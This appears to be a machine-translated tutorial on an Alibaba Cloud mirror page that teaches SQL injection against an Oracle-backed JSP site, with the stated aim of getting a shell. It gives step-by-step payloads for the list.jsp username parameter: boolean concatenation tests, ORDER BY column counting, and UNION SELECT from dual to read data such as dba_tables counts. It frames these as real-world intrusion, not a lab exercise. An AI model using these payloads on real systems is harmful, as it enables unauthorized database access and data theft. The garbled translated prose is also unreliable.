Oracle web Environment injection technology injection in the real world

Source: Internet
Author: User

The following article describes how to inject Oracle web Environment injection technology into the real world. If you want to know what injection is like in the real world, you must not miss the following articles. So let's try to get a shell from the injection point.

First, we find a page that may have an injection, list. jsp? Username = loveshell. An error occurs when we add a 'result. An Oracle background database is identified by an error. Oracle-xxxx contains Oracle, and then the statement is used:

 
 
  1. list.jsp?username=loveshell' and ''||'1'='1  

Normal

 
 
  1. list.jsp?username=loveshell' and ''||'2'='1  

Return null

 
 
  1. list.jsp?username=loveshell'-- 

In this way, we can know that it is an Oracle character injection point, so we can use this method to insert our own SQL statement list. jsp? Username = loveshell 'and [Our SQL statement] --

At this time, we can consider the subsequent intrusion ideas based on our own goals. One is to develop towards the web and penetrate the web by querying the database information. The other is to directly intrude into the database, of course, Oracle and web are a perfect machine. Let's talk about how to query the information stored in the database! To obtain information, we need to feedback the information back. One is to use union queries. For example, our intrusion method is similar to the following:

 
 
  1. list.jsp?username=loveshell' order by 10 

If the error message is reported, xx coloum does not exist. The number of fields is less than 10.

 
 
  1. list.jsp?username=loveshell' order by 5 

Normally displayed, the number of fields is greater than 5

At last, an error occurs when order by 8 is found. order by 7 is normal, which indicates that there are 7 fields. Note: In general, the page logic is very simple, so order by can be used to guess. However, if this parameter enters more than two SQL statements, the number of fields in the result is different, it is difficult to use this method.

Of course, if more than two SQL statements are entered, it is estimated that the union query cannot be used because the number of fields before and after the SQL statement is different and the conditions cannot be met, next we will talk about a omnipotent way to obtain data. Here we will talk about a more intuitive union query.

 
 
  1. list.jsp?username=loveshell' union select NULL,NULL,
    NULL,NULL,NULL,NULL,NULL from dual 

If you use seven NULL values to match the corresponding fields, there will be no different field types. Unlike mysql, an existing table must be added to the select statement next to it. Here, dual is used.

The returned result is normal, and then we can continue. The fields used for information feedback need to meet the conditions in my above basic ideas.

 
 
  1. list.jsp?username=loveshell' and 1=2 union select  

1, NULL, NULL from dual -- normal

 
 
  1. list.jsp?username=loveshell' and 1=2
    union select 1,2,NULL,NULL,NULL,NULL,NULL from dual 

Error. The second field is not numeric.

 
 
  1. list.jsp?username=loveshell' and 1=
    2 union select 1,'2',NULL,NULL,NULL,NULL,NULL from dual 

Error. The second field is not of the character type.

This is possible because fields include other types such as dates. This type is useless for our feedback, so NULL is skipped directly.

 
 
  1. list.jsp?username=loveshell' and 1=2 union select 1,
    NULL,'3',NULL,NULL,NULL,NULL from dual 

This is normal, and the corresponding position on the page is displayed. This field is exactly what we are looking. Sometimes, what if I want to see the number? For example, if you want to view the number of records, you can directly use the binary method, but it is more intuitive to directly display it. For example, you want to view the number of dba_tables records.

 
 
  1. list.jsp?username=loveshell' and 1=2 union select 1,
    to_char((select count(*) from dba_tables),'0000000'),
    NULL,NULL,NULL,NULL,NULL from dual 

The above content introduces the injection technology of Oracle web environment in the real world.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.